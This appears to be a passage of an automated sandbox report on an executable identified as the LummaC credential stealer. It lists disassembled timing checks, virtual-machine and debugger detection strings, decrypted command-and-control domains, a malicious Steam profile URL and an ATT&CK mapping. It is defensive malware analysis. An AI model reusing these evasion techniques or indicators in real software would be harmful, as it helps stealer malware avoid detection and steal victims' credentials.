    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E62DF second address: 7E631C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jo 00007EFF192B611Ch 0x00000010 pushad 0x00000011 jmp 00007EFF192B60F1h 0x00000016 jmp 00007EFF192B60EEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB011 second address: 7EB015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EACC0 second address: 7EACCA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFF192B60E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8759 second address: 7F875F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAB0A second address: 7FAB15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007EFF192B60E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB17 second address: 7FEB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480BAh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB26 second address: 7FEB7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007EFF192B60F5h 0x00000012 jmp 00007EFF192B60EFh 0x00000017 jmp 00007EFF192B60EFh 0x0000001c popad 0x0000001d pushad 0x0000001e jns 00007EFF192B60E6h 0x00000024 jc 00007EFF192B60E6h 0x0000002a jno 00007EFF192B60E6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB7C second address: 7FEB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821BC0 second address: 821BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 829408 second address: 82940D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8282B0 second address: 8282CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8282CF second address: 8282E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480C1h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8282E4 second address: 8282FA instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFF192B60E6h 0x00000008 js 00007EFF192B60E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8282FA second address: 8282FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8282FE second address: 828325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60EBh 0x00000007 jmp 00007EFF192B60F3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828325 second address: 82832B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82848A second address: 828496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFF192B60E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828496 second address: 8284A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8284A1 second address: 8284D0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFF192B60E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d jbe 00007EFF192B611Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007EFF192B60F8h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828636 second address: 828647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828790 second address: 828799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828CDE second address: 828D04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007EFF192480CCh 0x0000000f jmp 00007EFF192480C0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828D04 second address: 828D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828FC1 second address: 82900A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480C7h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop eax 0x00000016 jmp 00007EFF192480C2h 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jc 00007EFF192480B6h 0x00000026 popad 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82BCE8 second address: 82BCEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82EEB2 second address: 82EECB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007EFF192480B6h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82EECB second address: 82EEE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60ECh 0x00000007 jl 00007EFF192B60E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82EEE4 second address: 82EEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82EEEE second address: 82EF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007EFF192B60EDh 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830DDD second address: 830DE6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BE3 second address: 5020C57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f jmp 00007EFF192B60EEh 0x00000014 test ecx, ecx 0x00000016 jmp 00007EFF192B60F0h 0x0000001b jns 00007EFF192B6135h 0x00000021 jmp 00007EFF192B60F0h 0x00000026 add eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007EFF192B60F7h 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C57 second address: 5020C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF192480C4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C6F second address: 5020C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C73 second address: 5020CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax+00000860h] 0x0000000e pushad 0x0000000f mov edi, 198B95A0h 0x00000014 pushfd 0x00000015 jmp 00007EFF192480C9h 0x0000001a and cx, 1CA6h 0x0000001f jmp 00007EFF192480C1h 0x00000024 popfd 0x00000025 popad 0x00000026 test eax, eax 0x00000028 pushad 0x00000029 mov edi, ecx 0x0000002b call 00007EFF192480C8h 0x00000030 mov ch, CCh 0x00000032 pop edx 0x00000033 popad 0x00000034 je 00007EFF89E1E13Bh 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007EFF192480C9h 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CAD2 second address: 73CAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040049 second address: 50400AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFF192480C7h 0x00000009 or ax, 26CEh 0x0000000e jmp 00007EFF192480C9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007EFF192480C0h 0x0000001a sub ch, 00000048h 0x0000001d jmp 00007EFF192480BBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50400AD second address: 50400C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50400C8 second address: 5040118 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007EFF192480BEh 0x00000010 mov edx, dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007EFF192480BCh 0x0000001b sbb ah, 00000068h 0x0000001e jmp 00007EFF192480BBh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040118 second address: 5040121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040121 second address: 5040125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7330F4 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 757CA9 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7386A5 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7BC9FD instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 4444Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
    Source: file.exe, file.exe, 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.4.drBinary or memory string: VMware
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: file.exe, 00000000.00000002.1951560374.000000000125E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005700D0 LdrInitializeThunk,0_2_005700D0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exe, file.exe, 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VProgram Manager
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		2
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping641
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		2
    Process Injection    		LSASS Memory24
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
    Obfuscated Files or Information    		NTDS223
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.TPM.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    steamcommunity.com0%VirustotalBrowse
    sergei-esenin.com18%VirustotalBrowse
    studennotediw.store18%VirustotalBrowse
    bathdoomgaz.store22%VirustotalBrowse
    spirittunek.store22%VirustotalBrowse
    mobbipenju.store22%VirustotalBrowse
    clearancek.site18%VirustotalBrowse
    licendfilteo.site16%VirustotalBrowse
    dissapoiznw.store22%VirustotalBrowse
    eaglepawnoy.store19%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://player.vimeo.com0%URL Reputationsafe
    https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steam.tv/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://steamcommunity.com:443/profiles/76561199724331900100%URL Reputationmalware
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://lv.queniujq.cn0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://checkout.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://avatars.akamai.steamstatic0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/;0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
